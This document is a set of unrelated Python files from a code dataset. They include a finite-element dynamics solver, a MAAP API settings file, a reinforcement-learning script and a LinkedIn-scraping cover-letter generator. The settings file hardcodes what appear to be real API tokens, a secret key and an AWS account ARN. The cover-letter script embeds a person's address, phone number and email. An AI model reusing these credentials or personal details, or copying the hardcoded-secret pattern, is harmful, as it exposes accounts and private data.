ok\nwhile hoatdong:\n\tHienthitrangchu()\n\ttukhoa = int(input('Ban muon lam gi: '))\n\tif tukhoa == 0:\n\t\thoatdong = False\n\telif tukhoa == 1:\n\t\tfind();\n\telif tukhoa == 2:\n\t\tshow();\nprint('Hen gap lai ^-^')\n# phải nhấp phím Shift và bấm chuột phải\n# ok\n# ok xong nha nho like va dang ky cho minh nhe\n","sub_path":"quay/tudienpython/tudien.py","file_name":"tudien.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"209871676","text":"\ndef leer_linea(archivo):\n \"\"\"\n Esta funcion lee la una linea del archivo csv, y devuelve una lista con\n los valores de esa linea.\n\n Autor:...\n \"\"\"\n linea = archivo.readline()\n lista_linea = linea.rstrip('\\n').split(',')\n \n return lista_linea\n \n\ndef configuracion():\n \"\"\"\n Se toman los datos del archivo csv y se devuelve una lista con los valores numéricos \n que se encunetran en el mismos.\n\n Autor:...\n \"\"\"\n archivo_abierto = open(\"configuracion.csv\")\n lista_linea = leer_linea(archivo_abierto)\n valores = []\n while lista_linea != [''] :\n valor = lista_linea[1]\n valores.append(int(valor))\n lista_linea = leer_linea(archivo_abierto)\n \n \n return valores\n \n\n\n\n\n","sub_path":"configuracion.py","file_name":"configuracion.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"545698303","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.3.3\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\nimport numpy as np\nfrom scipy.sparse.linalg import spsolve\nfrom scipy.sparse import csr_matrix\nimport sys\nimport time\n\n\ndef inputdata(fnameR,nod,nfree): #データパス, 要素節点数, 自由度\n f=open(fnameR,'r') \n text=f.readline() # 1行ずつ読み込む\n text=text.strip() # 端の空白, 改行(\\n)を削除\n text=text.split() # ',' で別れた要素ごとの配列にする\n npoin=int(text[0]) # ノード数\n nele =int(text[1]) # 要素数\n npfix=int(text[2]) # 拘束点数\n nlod =int(text[3]) # 荷重点数\n delta_t =float(text[4]) # 微小時間\n n_t =int(text[5]) # 微小時間数\n # 配列宣言\n ae =np.zeros((10,nele),dtype=np.float64) # 要素特性 \n node =np.zeros((nod+1,nele),dtype=np.int) # 要素構成節点\n x =np.zeros((3,npoin),dtype=np.float64) # 座標\n mpfix =np.zeros((n_t+1, nfree,npoin),dtype=np.int) # 拘束状態\n rdis =np.zeros((n_t+1, nfree,npoin),dtype=np.float64) # 既知変位\n fp =np.zeros((n_t+1, nfree*npoin),dtype=np.float64) # 外力\n # 要素特性: ae\n for i in range(0,nele):\n text=f.readline()\n text=text.strip()\n text=text.split()\n ae[0,i] =float(text[0]) # E\n ae[1,i] =float(text[1]) # Po\n ae[2,i] =float(text[2]) # A \n ae[3,i] =float(text[3]) # Ix\n ae[4,i] =float(text[4]) # Iy\n ae[5,i] =float(text[5]) # Iz\n ae[6,i] =float(text[6]) # mass\n ae[7,i] =float(text[7]) # gkx\n ae[8,i] =float(text[8]) # gky\n ae[9,i] =float(text[9]) # gkz\n\n # 要素構成節点: node\n for i in range(0,nele):\n text=f.readline()\n text=text.strip()\n text=text.split()\n node[0,i]=int(text[0]) #node_1\n node[1,i]=int(text[1]) #node_2\n node[2,i]=int(text[2]) #要素番号\n \n # 座標: x\n for i in range(0,npoin):\n text=f.readline()\n text=text.strip()\n text=text.split()\n x[0,i]=float(text[0]) # x-座標\n x[1,i]=float(text[1]) # y-座標\n x[2,i]=float(text[2]) # z-座標\n \n for j in range(0, n_t+1):\n # 境界条件(拘束状態) (0:free, 1:restricted)\n for i in range(0,npfix):\n text=f.readline()\n text=text.strip()\n text=text.split()\n lp=int(text[0]) # 固定されたノード番号\n mpfix[j,0,lp-1]=int(text[1]) # x方向固定\n mpfix[j,1,lp-1]=int(text[2]) # y方向固定\n mpfix[j,2,lp-1]=int(text[3]) # z方向固定\n mpfix[j,3,lp-1]=int(text[4]) # x軸回転固定\n mpfix[j,4,lp-1]=int(text[5]) # y軸回転固定\n mpfix[j,5,lp-1]=int(text[6]) # z軸回転固定\n rdis[j,0,lp-1]=float(text[7]) # x方向既知変位\n rdis[j,1,lp-1]=float(text[8]) # y方向既知変位\n rdis[j,2,lp-1]=float(text[9]) # z方向既知変位\n rdis[j,3,lp-1]=float(text[10]) # x軸既知回転量\n rdis[j,4,lp-1]=float(text[11]) # y軸既知回転量\n rdis[j,5,lp-1]=float(text[12]) # z軸既知回転量 \n\n # 荷重\n for i in range(0,nlod):\n text=f.readline()\n text=text.strip()\n text=text.split()\n lp=int(text[0]) \n fp[j,6*lp-6]=float(text[1]) # x方向荷重\n fp[j,6*lp-5]=float(text[2]) # y方向荷重\n fp[j,6*lp-4]=float(text[3]) # z方向荷重\n fp[j,6*lp-3]=float(text[4]) # x軸モーメント\n fp[j,6*lp-2]=float(text[5]) # y軸モーメント\n fp[j,6*lp-1]=float(text[6]) # z軸モーメント\n f.close()\n return npoin,nele,npfix,nlod,delta_t,n_t,ae,node,x,mpfix,rdis,fp\n\n\n# 要素剛性マトリックス作成(local)\ndef sm_3dfrm(EA,GJ,EIy,EIz,x1,y1,z1,x2,y2,z2):\n ek=np.zeros((12,12),dtype=np.float64) # local stiffness matrix\n xx=x2-x1\n yy=y2-y1\n zz=z2-z1\n el=np.sqrt(xx**2+yy**2+zz**2)\n ek[ 0, 0]= EA/el\n ek[ 0, 6]=-EA/el\n ek[ 1, 1]= 12*EIz/el**3\n ek[ 1, 5]= 6*EIz/el**2\n ek[ 1, 7]=-12*EIz/el**3\n ek[ 1,11]= 6*EIz/el**2\n ek[ 2, 2]= 12*EIy/el**3\n ek[ 2, 4]= -6*EIy/el**2\n ek[ 2, 8]=-12*EIy/el**3\n ek[ 2,10]= -6*EIy/el**2\n ek[ 3, 3]= GJ/el\n ek[ 3, 9]=-GJ/el\n ek[ 4, 2]= -6*EIy/el**2\n ek[ 4, 4]= 4*EIy/el\n ek[ 4, 8]= 6*EIy/el**2\n ek[ 4,10]= 2*EIy/el\n ek[ 5, 1]= 6*EIz/el**2\n ek[ 5, 5]= 4*EIz/el\n ek[ 5, 7]= -6*EIz/el**2\n ek[ 5,11]= 2*EIz/el\n ek[ 6, 0]=-EA/el\n ek[ 6, 6]= EA/el\n ek[ 7, 1]=-12*EIz/el**3\n ek[ 7, 5]= -6*EIz/el**2\n ek[ 7, 7]= 12*EIz/el**3\n ek[ 7,11]= -6*EIz/el**2\n ek[ 8, 2]=-12*EIy/el**3\n ek[ 8, 4]= 6*EIy/el**2\n ek[ 8, 8]= 12*EIy/el**3\n ek[ 8,10]= 6*EIy/el**2\n ek[ 9, 3]=-GJ/el\n ek[ 9, 9]= GJ/el\n ek[10, 2]= -6*EIy/el**2\n ek[10, 4]= 2*EIy/el\n ek[10, 8]= 6*EIy/el**2\n ek[10,10]= 4*EIy/el\n ek[11, 1]= 6*EIz/el**2\n ek[11, 5]= 2*EIz/el\n ek[11, 7]= -6*EIz/el**2\n ek[11,11]= 4*EIz/el\n return ek\n\n\ndef mass_3dfrm(ae_mass, npoin, nfree):\n # 番兵追加\n mass = np.append(ae_mass, 0.0)\n mass = np.insert(mass, 0, 0.0) \n ret = np.zeros((npoin*nfree, npoin*nfree), dtype=np.float64)\n node_mass_array = np.zeros(npoin, dtype=np.float64)\n for i in range(0, len(mass) - 1):\n node_mass = (mass[i] + mass[i+1]) / 2.0\n node_mass_array[i] = node_mass\n for j in range(3):\n idx = i*nfree + j\n ret[idx,idx] = node_mass\n return ret, node_mass_array\n\n\n# gamma: mass, omega: k\ndef dumping_3dfrm(gamma, omega, mass_mat, k):\n m = gamma * mass_mat\n ret = omega * k \n for i in range(0, len(ret)):\n ret[i, i] += m[i, i] \n return ret\n\n\n# CDM マトリックスを作成\ndef cdm_3dfrm(delta_t, mass_mat, c_mat):\n c_mat = (1.0/(2*delta_t))*c_mat\n for i in range(0, len(c_mat)):\n c_mat[i, i] += (1.0/(delta_t*delta_t))*mass_mat[i, i] \n return c_mat\n\n\ndef main_3d_CDM_FEM(file_path):\n start=time.time()\n args = sys.argv\n fnameR=args[1]\n fnameW=args[2]\n nod=2\n nfree=6 \n gamma=0.0 # dumping param\n omega=0.0 # dumping param\n npoin,nele,npfix,nlod,delta_t,n_t,ae,node,x,mpfix,rdis,fp=inputdata(file_path, nod,nfree)\n mass_mat=mass_3dfrm(ae[6], npoin, nfree) \n acc=np.zeros((n_t+1, nfree*npoin), dtype=np.float64)\n vec=np.zeros((n_t+1, nfree*npoin), dtype=np.float64)\n dis=np.zeros((n_t+1, nfree*npoin), dtype=np.float64)\n # U-1\n dis_negative1=dis[0] - delta_t*vec[0] + (delta_t*delta_t/2)*acc[0] \n for step in range(1, n_t+1):\n ir=np.zeros(nod*nfree, dtype=np.int) \n gk=np.zeros((nfree*npoin, nfree*npoin), dtype=np.float64) # Global stifness matrix\n \n # assembly stifness matrix & load vector\n for ne in range(0, nele):\n i=node[0,ne]-1\n j=node[1,ne]-1\n m=node[2,ne]-1\n x1=x[0,i]; y1=x[1,i]; z1=x[2,i]\n x2=x[0,j]; y2=x[1,j]; z2=x[2,j]\n ee =ae[0,m] # elastic modulus\n po =ae[1,m] # Poisson's ratio\n aa =ae[2,m] # section area\n aix =ae[3,m] # tortional constant\n aiy =ae[4,m] # moment of inertia around y-axis\n aiz =ae[5,m] # moment of inertia around z-axis\n mass =ae[6,m] # unit weight of material\n gkX =ae[7,m] # seismic coefficient in X-direction\n gkY =ae[8,m] # seismic coefficient in Y-direction\n gkZ =ae[9,m] # seismic coefficient in Z-direction\n A=aa # section area\n EA=ee*aa\n GJ=ee/2/(1+po)*aix\n EIy=ee*aiy\n EIz=ee*aiz\n ek =sm_3dfrm(EA,GJ,EIy,EIz,x1,y1,z1,x2,y2,z2) # local Stiffness matrix \n ir[11]=6*j+5; ir[10]=ir[11]-1; ir[9]=ir[10]-1; ir[8]=ir[9]-1; ir[7]=ir[8]-1; ir[6]=ir[7]-1\n ir[5] =6*i+5; ir[4] =ir[5]-1 ; ir[3]=ir[4]-1 ; ir[2]=ir[3]-1; ir[1]=ir[2]-1; ir[0]=ir[1]-1 \n for i in range(0, nod*nfree):\n it=ir[i]\n for j in range(0, nod*nfree):\n jt=ir[j]\n gk[it, jt] = gk[it, jt] + ek[i,j] \n c_mat=dumping_3dfrm(gamma, omega, gk, mass_mat)\n cdm_mat=cdm_3dfrm(delta_t, mass_mat, c_mat)\n # fpを整理\n tmp1 = gk\n for i in range(0, len(gk)):\n tmp1[i,i] -= (2.0/(delta_t**2))*mass_mat[i,i]\n \n tmp2 = (-1)*(1.0/(2*delta_t))*c_mat\n for i in range(0, len(c_mat)):\n tmp2[i,i] += (1.0/(delta_t**2))*mass_mat[i,i]\n \n if step==1:\n fp[step] = fp[step] - np.dot(tmp1, dis[step-1]) - np.dot(tmp2, dis_negative1)\n else:\n fp[step] = fp[step] - np.dot(tmp1, dis[step-1]) - np.dot(tmp2, dis[step-2]) \n \n # boudary conditions\n for i in range(0, npoin):\n for j in range(0, nfree):\n if mpfix[step, j, i] == 1:\n iz=i*nfree+j\n fp[step,iz]=0.0\n\n for i in range (0, npoin):\n for j in range(0, nfree):\n if mpfix[step, j, i] == 1:\n iz=i*nfree+j\n cdm_mat[:,iz]=0.0\n cdm_mat[iz,iz]=1.0\n \n # 疎行列圧縮格納\n sp_cdm_mat = csr_matrix(cdm_mat)\n dis[step] = spsolve(sp_cdm_mat, fp[step], use_umfpack=True)\n \n # 拘束条件を再代入する\n for i in range(0, npoin):\n for j in range(0, nfree):\n if mpfix[step, j, i] == 1:\n iz=i*nfree+j\n dis[step, iz] = rdis[step, j, i] \n \n # 速度, 加速度計算 \n if (step==1):\n acc[step-1] = (1.0/(delta_t**2))*(dis_negative1 - 2*dis[step-1] - dis[step])\n vec[step-1] = (1.0/(2*delta_t))*(dis[step]-dis_negative1)\n else:\n acc[step-1] = (1.0/(delta_t**2))*(dis[step-2] - 2*dis[step-1] - dis[step])\n vec[step-1] = (1.0/(2*delta_t))*(dis[step]-dis[step-2])\n \n dtime=time.time()-start\n print('time: {0:.3f}'.format(dtime)+'sec')\n return dis\n","sub_path":"python/jupyter_notebook/other-dynamic-FEM-methods/.ipynb_checkpoints/3D_CDM_FEM-checkpoint.py","file_name":"3D_CDM_FEM-checkpoint.py","file_ext":"py","file_size_in_byte":10976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"214760106","text":"MAAP_API_URL = \"https://api.dit.maap-project.org/api\"\nPROJECT_QUEUE_PREFIX = \"maap\"\nAPI_HOST_URL = 'http://0.0.0.0:5000/'\n# API_HOST_URL = 'https://api.maap-project.org/api'\n\n# Flask settings\nFLASK_SERVER_NAME = 'localhost:5000'\nFLASK_DEBUG = True # Do not use debug mode in production\n\n# Flask-Restplus settings\nRESTPLUS_SWAGGER_UI_DOC_EXPANSION = 'list'\nRESTPLUS_VALIDATE = True\nRESTPLUS_MASK_SWAGGER = False\nRESTPLUS_ERROR_404_HELP = False\n\n# CMR settings\n\n# # NASA UAT\n# CMR_URL = 'https://cmr.uat.earthdata.nasa.gov'\n# CMR_API_TOKEN = '4C40153D-6CC6-D01A-58E2-D8F3CAFB5472'\n# CMR_CLIENT_ID = 'maap-api-cmr'\n\nCMR_TOKEN_SERVICE_URL = 'https://cmr.earthdata.nasa.gov/legacy-services/rest/tokens'\n\n# MAAP DEV\nCMR_URL = 'https://cmr.maap-project.org'\nCMR_API_TOKEN = ''\nCMR_CLIENT_ID = ''\nMAAP_WMTS_XML = '/maap-api-nasa/api/maap.wmts.xml'\n\n# GIT settings\nGIT_REPO_URL = 'https://gitlab-ci-token:$TOKEN@repo.dit.maap-project.org/root/register-job.git'\n\n# GTILAB Settings\nGITLAB_TOKEN = 'foobar'\nMAAP_ENVIRONMENT_FILE = 'https://raw.githubusercontent.com/MAAP-Project/maap-jupyter-ide/develop/maap_environments.json'\n\nREPO_NAME = 'register-job'\nREPO_PATH = '/home/ubuntu/repo'\nVERSION = 'master'\nSUPPORTED_EXTENSIONS = ['py', 'java', 'sh']\n\n# Docker container URL\nCONTAINER_URL = 'registry.dit.maap-project.org/root/dps_plot:master'\n\n# HySDS Mozart\nMOZART_URL = 'https://[MOZART_IP]/mozart/api/v0.2'\nDEFAULT_QUEUE = 'test-job_worker-large'\nLW_QUEUE = 'system-jobs-queue'\nHYSDS_LW_VERSION = 'v0.0.5'\nGRQ_REST_URL = 'http://[GRQ_IP]/api/v0.1'\nS3_CODE_BUCKET = 's3://[S3_BUCKET_NAME]'\n\n# Dynamic Tiler API - OLD API\n#\n# Uncomment the `TILER_ENDPOINT` line below if testing api.maap-project.org at this time.\n# api.maap-project.org is using an older version of the Dynamic Tiler API.\n# TILER_ENDPOINT = 'https://8e9mu91qr6.execute-api.us-east-1.amazonaws.com/production'\n\n# Dynamic Tiler API - NEW API\n# The updated WMTS code (api/endpoints/wmts.py) should work with the newer version of the tiler API is deployed at the URL below.\nTILER_ENDPOINT = 'https://d852m4cmf5.execute-api.us-east-1.amazonaws.com'\n\n# 3D Tiles API\n_3DTILES_API_ENDPOINT = 'https://llxbmdibvf.execute-api.us-east-1.amazonaws.com/test'\nDATA_SYSTEM_FILES_PATH = '/file-staging/nasa-map/'\n\n# CAS\nCAS_SECRET_KEY = '9c0d611c-04c5-4f36-b91c-8374b4410590'\nCAS_SERVER_NAME = 'https://auth.dit.maap-project.org/cas'\nCAS_AFTER_LOGIN = 'api.members_self'\nCAS_PROXY_DECRYPTION_TOKEN = ''\n\n# Query Service\nQS_STATE_MACHINE_ARN = 'arn:aws:states:us-east-1:532321095167:stateMachine:maap-api-query-service-dev-RunQuery'\nQS_RESULT_BUCKET = 'maap-api-query-service-dev-query-results'\n\n# AWS\nAWS_REGION = 'us-east-1'\nWORKSPACE_MOUNT_PRIVATE = 'my-private-bucket'\nWORKSPACE_MOUNT_PUBLIC = 'my-public-bucket'\nWORKSPACE_MOUNT_SHARED = 'shared-buckets'\nAWS_SHARED_WORKSPACE_BUCKET_PATH = 'shared'\n\n# DB\nDATABASE_URL='postgresql://localhost/maap_dev'\n\n# OGC API - Features\nOGCAPI_FEATURES_ENDPOINT = \"https://sidgr9d5ak.execute-api.us-west-2.amazonaws.com\"\n","sub_path":"api/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"571637521","text":"#def input():\n# return open(\"data\",\"r\").readline()\n\ndef solve(sub1, sub2):\n result = 0\n for i in range(len(sub2)+1):\n A1 = sub2[:i]\n B1 = sub2[i:]\n A2 = sub1[:i]\n B2 = sub1[-(len(sub2)-i):]\n if i == len(sub2):\n B2 = \"\"\n if A1==A2 and B1==B2:\n result += 1\n return result\n\n\n\nS = input()\nfirst = S[:1]\nlast = S[-1:]\n\nstring = last+first\n#print(string)\n\nresult = 0\nfor i in range(int(len(S)/2),len(S)):\n index = S.find(string,i)\n if index != -1 and index < len(S)-2:\n sub1 = S[1:index]\n sub2 = S[index+2:-1]\n result += solve(sub1, sub2)\n\nprint(result)","sub_path":"AtCoder/regular55/takaitai.py","file_name":"takaitai.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"564752850","text":"from core.input_a import ContextCropService\nimport tensorflow as tf\n\n\nflags = tf.flags\nFLAGS = flags.FLAGS\n\n\nclass InputExample(object):\n \"\"\"A single training/test example for simple sequence classification.\"\"\"\n\n SEP = \"#\"\n WORD_SEP = \" \"\n OBJ_MASK = \"O\"\n SUBJ_MASK = \"S\"\n\n def __init__(self, guid, text_a, s_obj, t_obj, text_b=None, label=None):\n \"\"\"Constructs a InputExample.\n\n Args:\n guid: Unique id for the example.\n text_a: string. The untokenized text of the first sequence. For single\n sequence tasks, only this sequence must be specified.\n text_b: (Optional) string. The untokenized text of the second sequence.\n Only must be specified for sequence pair tasks.\n label: (Optional) string. The label of the example. This should be\n specified for train and dev examples, but not for test examples.\n \"\"\"\n\n text_a = self.__optionally_fix_quoted_text(text_a)\n if text_b is not None:\n text_b = self.__optionally_fix_quoted_text(text_b)\n\n self.guid = guid\n self.text_a = InputExample.__process_text_a(text=text_a, s_obj=s_obj, t_obj=t_obj)\n self.text_b = text_b\n self.label = label\n\n @staticmethod\n def __process_text_a(text, s_obj, t_obj):\n assert(isinstance(s_obj, int))\n assert(isinstance(t_obj, int))\n\n terms = text.strip().split(InputExample.WORD_SEP)\n\n cropped_text = ContextCropService.fit_context_vector(\n vector=terms, e1_in=s_obj, e2_in=t_obj,\n expected_size=FLAGS.max_seq_length)\n\n expanded_terms = InputExample.__surround_ends_with_extra_char(\n terms=cropped_text.Value,\n e1_in=cropped_text.StartIndex,\n e2_in=cropped_text.EndIndex)\n\n return InputExample.WORD_SEP.join(expanded_terms)\n\n @staticmethod\n def __optionally_fix_quoted_text(text):\n if text[0] == text[-1] == '\"':\n text = text[1:-1].replace('\"\"', '\"')\n return text\n\n @staticmethod\n def __surround_ends_with_extra_char(terms, e1_in, e2_in):\n \"\"\" Replacing ends in order to find them later, after tokenization\n \"\"\"\n assert(isinstance(terms, list))\n assert(isinstance(e1_in, int))\n assert(isinstance(e2_in, int))\n\n entities = [InputExample.OBJ_MASK, InputExample.SUBJ_MASK]\n\n # NOTE: We additionally remove all the # symbols,\n # however the latter could be done during serialization stage\n # by selecting an appropriate entities formatter.\n terms[e1_in] = terms[e1_in].replace(\"#\", \"\")\n terms[e2_in] = terms[e2_in].replace(\"#\", \"\")\n\n assert(terms[e1_in] in entities)\n assert(terms[e2_in] in entities)\n\n result = []\n for term_index, term in enumerate(terms):\n if term_index == e1_in or term_index == e2_in:\n result.append(InputExample.SEP)\n result.append(term)\n result.append(InputExample.SEP)\n else:\n result.append(term)\n\n return result\n\n","sub_path":"core/input_example.py","file_name":"input_example.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"184458312","text":"#!/usr/bin/env python\n# coding=utf-8\n'''\nAuthor: John\nEmail: johnjim0816@gmail.com\nDate: 2020-11-22 23:21:53\nLastEditor: John\nLastEditTime: 2021-03-23 16:38:54\nDiscription: \nEnvironment: \n'''\nimport sys,os\nsys.path.append(os.getcwd()) # add current terminal path to sys.path\nfrom itertools import count\nimport datetime\nimport gym\nfrom PolicyGradient.agent import PolicyGradient\nfrom common.plot import plot_rewards\nfrom common.utils import save_results\n\nSEQUENCE = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\") # obtain current time\nSAVED_MODEL_PATH = os.path.split(os.path.abspath(__file__))[0]+\"/saved_model/\"+SEQUENCE+'/' # path to save model\nif not os.path.exists(os.path.split(os.path.abspath(__file__))[0]+\"/saved_model/\"): \n os.mkdir(os.path.split(os.path.abspath(__file__))[0]+\"/saved_model/\")\nif not os.path.exists(SAVED_MODEL_PATH):\n os.mkdir(SAVED_MODEL_PATH)\nRESULT_PATH = os.path.split(os.path.abspath(__file__))[0]+\"/results/\"+SEQUENCE+'/' # path to save rewards\nif not os.path.exists(os.path.split(os.path.abspath(__file__))[0]+\"/results/\"): \n os.mkdir(os.path.split(os.path.abspath(__file__))[0]+\"/results/\")\nif not os.path.exists(RESULT_PATH): \n os.mkdir(RESULT_PATH)\n\nclass PGConfig:\n def __init__(self):\n self.train_eps = 300 # 训练的episode数目\n self.batch_size = 8\n self.lr = 0.01 # learning rate\n self.gamma = 0.99\n self.hidden_dim = 36 # dimmension of hidden layer\n \ndef train(cfg,env,agent):\n '''下面带pool都是存放的transition序列用于gradient'''\n state_pool = [] # 存放每batch_size个episode的state序列\n action_pool = []\n reward_pool = [] \n ''' 存储每个episode的reward用于绘图'''\n rewards = []\n ma_rewards = []\n for i_episode in range(cfg.train_eps):\n state = env.reset()\n ep_reward = 0\n for _ in count():\n action = agent.choose_action(state) # 根据当前环境state选择action\n next_state, reward, done, _ = env.step(action)\n ep_reward += reward\n if done:\n reward = 0\n state_pool.append(state)\n action_pool.append(float(action))\n reward_pool.append(reward)\n state = next_state\n if done:\n print('Episode:', i_episode, ' Reward:', ep_reward)\n break\n if i_episode > 0 and i_episode % cfg.batch_size == 0:\n agent.update(reward_pool,state_pool,action_pool)\n state_pool = [] # 每个episode的state\n action_pool = []\n reward_pool = []\n rewards.append(ep_reward)\n if ma_rewards:\n ma_rewards.append(\n 0.9*ma_rewards[-1]+0.1*ep_reward)\n else:\n ma_rewards.append(ep_reward)\n print('complete training!')\n return rewards, ma_rewards\n \nif __name__ == \"__main__\":\n cfg = PGConfig()\n env = gym.make('CartPole-v0') # 可google为什么unwrapped gym,此处一般不需要\n env.seed(1) # 设置env随机种子\n state_dim = env.observation_space.shape[0]\n action_dim = env.action_space.n\n agent = PolicyGradient(state_dim,cfg)\n rewards, ma_rewards = train(cfg,env,agent)\n agent.save_model(SAVED_MODEL_PATH)\n save_results(rewards,ma_rewards,tag='train',path=RESULT_PATH)\n plot_rewards(rewards,ma_rewards,tag=\"train\",algo = \"Policy Gradient\",path=RESULT_PATH)\n","sub_path":"codes/PolicyGradient/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"181064116","text":"### Data\nimport yaml\n### Dash\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\n\nfrom navbar import Navbar\nfrom footer import Footer\n\nnav = Navbar()\nfooter = Footer()\n\n# Load team members\nwith open(\"assets/team_members/team.yml\") as f:\n members = yaml.load(f, Loader=yaml.FullLoader)\nnum_members = len(members)\n\nwith open(\"assets/collaborators/organizations.yml\") as f:\n collaborators = yaml.load(f, Loader=yaml.FullLoader)\nnum_collaborators = len(collaborators)\n\n# Single member pic\ndef member_pic(member):\n return dbc.Col(\n [\n dbc.Card(\n [\n dbc.CardImg(src='assets/team_members/photos/%s' % member['photo']),\n dbc.CardBody(\n html.A(member['name'],\n href=member['website'],\n className=\"stretched-link team-name\"),\n className=\"team-card-body\",\n ),\n ],\n className=\"team-card h-100 w-100\"\n )\n ],\n xs=12,\n sm=6,\n md=3,\n lg=3,\n xl=2,\n style={'marginBottom': 7}\n )\n\n# Single collaborator pic\ndef collab_pic(collaborator):\n return dbc.Col(\n [\n html.A([\n html.Div(\n [\n html.Img(\n src='assets/collaborators/photos/%s' % collaborator['photo'],\n className=\"collabs\"\n ),\n ],\n style={'display': 'inline-block'}\n )\n ], href=collaborator['website'])\n ],\n width='auto',\n )\n\n# Table rows\nmember_rows = \\\n [\n dbc.Row(\n [\n member_pic(members[0])\n ],\n justify=\"around\"\n )\n ] + \\\n [\n dbc.Row(\n [\n member_pic(members[i]) for i in range(1,num_members)\n ],\n justify=\"around\",\n )\n ]\n\ncollab_rows = \\\n [\n dbc.Row(\n [\n collab_pic(collaborators[i]) for i in range(num_collaborators)\n ],\n justify=\"around\",\n )\n ]\n\nbody = dbc.Container(\n [\n dbc.Row(\n [\n dbc.Col(\n [\n html.H2(\"Our Team\"),\n html.P('Our team comprises passionate researchers in Operations Research \\\n and Analytics. We are eager to use our collective skills and create new \\\n tools that can help the scientific community fight against the pandemic.')\n ]\n )\n ],\n style={'marginBottom': 20}\n )\n ] + member_rows +\n [dbc.Row(\n [\n dbc.Col(\n [\n html.H2(\"Our Collaborators\"),\n ]\n )\n ],\n style={'marginBottom': 20,'marginTop': 40}\n )\n ] + collab_rows,\n className=\"page-body\"\n )\n\ndef Team():\n layout = html.Div([nav, body, footer],className=\"site\")\n return layout\n","sub_path":"about_us/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"181148385","text":"import datetime\nimport docx\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\nfrom docx.shared import Pt\nfrom selenium import webdriver\n\n\n## Data collecting without API\n\nprint(\"Welcome to Cover Letter Premium!\")\nprint(\"------------------------------\")\njob_url = \"https://www.linkedin.com/jobs/view/1347102437/\" # input(\"please input your URL: \")\n\n\n\n# MAKE SURE TO SET ENGLISH AS THE LANGUAGE\n# source: https://sqa.stackexchange.com/questions/9904/how-to-set-browser-locale-with-chromedriver-python#\noptions = webdriver.ChromeOptions()\n#options.add_experimental_option(\"prefs\", {\"intl.accept_languages\": \"es\"}) # THIS WORKS - GETS SPANISH\noptions.add_experimental_option(\"prefs\", {\"intl.accept_languages\": \"en,en_US\"})\n\n# download chromedriver from http://chromedriver.chromium.org/downloads\n# and replace the path with where you download it\ndriver = webdriver.Chrome(\"/usr/local/bin/chromedriver\", chrome_options=options)\n\n\n\n\ndriver.get(job_url)\nprint(driver.title)\n\n\n\nbreakpoint()\n\n\n\njob_info = driver.find_element_by_tag_name('title').get_attribute('text')\n\nprint(job_info) #> 'Accenture hiring Software Developer Engineer - Associate Manager - Denver, CO in Denver, CO, US | LinkedIn'\n\ninfo_list = job_info.split('hiring')\ntitle = info_list[1]\ncompany = info_list[0]\ndescription = driver.find_element_by_css_selector(\"div.description__text--rich\").text\n\njob_dict = {\n\t'title': title,\n\t'company': company,\n\t'description': description\n}\n\nprint(job_dict)\n\n\ndriver.quit()\n\n\n\n\n\n\n\n\n\n#breakpoint()\n\n\n## user profile\nuser_name = \"Ruolin Gou\"\nuser_status = \"Master's student\"\nuser_major = \"Social and Consumer Psychology Program\"\nuser_address = \"10 River rd, Apt 4N, New York, NY, 10044\"\nuser_phone = \"646-243-0136\"\nuser_email = \"rg@3556@nyu.edu\"\n\n## STARTING\n# March, 30th, 2019\ntoday = datetime.date.today()\nF_today = today.strftime(\"%B, %d, %Y\")\n# print(F_today)\n\n# company_name = \"Phoenix Marketing International\"\ncompany_name = job_dict[\"company\"]\ncompany_address_1 = \"1430 Broadway, 19th Floor\"\ncompany_address_2 = \"New York, NY 10018\"\n\nstart = f\"\"\"\n{F_today}\n\n{company_name}\n{company_address_1}\n{company_address_2}\n\"\"\"\nprint(start)\n\n## BOBY CONTENTS\n# job_title = \"Market research Intern\"\njob_title = job_dict[\"title\"]\n\nskill_1 = \"analytical\" # = filtered_1\nskill_2 = \"market reserch\" # = filtered_2\nskill_3 = \"communication\" # = filtered_3\nintro_p = f\"I want to express my immense interest in the opportunity of the {job_title} at {company_name}. I am a {user_status.lower()} in the {user_major} at NYU graduating in 2020. For this {job_title} position, I am excited to apply my market research and consumer behavior knowledge to real-world situations and learn valuable experience from industry professionals. I believe that my qualifications and educational pursuits are a great fit with the kind of candidate you company is looking for. Given my passion and knowledge, I would be able to contribute to this role immediately.\"\nanalytical_research = \"I know this position requires strong analytical and research ability, and my previous research experiences strongly supported my competence. I worked as a research assistant in two psychology labs at Willamette University for three years and actively engaged in both experimental design and data analysis processes. The complicated experimental design procedure improved my skills of thorough design and organization and attention to details. The data analysis processes, including data coding, cleaning, analysis, visualization, and interpretation, gave me great opportunities to apply my statistical knowledge and strengthen my analytical skills. From my current master program, I have learned market research methods and design thinking, using interviews, focus groups, and other qualitative methods to achieve human-centered designs. I am trained to apply psychological theories to the marketing industry and be familiar with qualitative research and analysis as well.\"\n\ncommunication = \"Additionally, my communication skills gained good practice during my research experience. During the data collection, I have to understand the purpose of my supervisors and transmit correct information to experiment participants to gain expected and unbiased results. This training enhanced both my communication clarity and confidence.\"\nglobal_leadership = \"My prior experience of running an international student council gave me an excellent 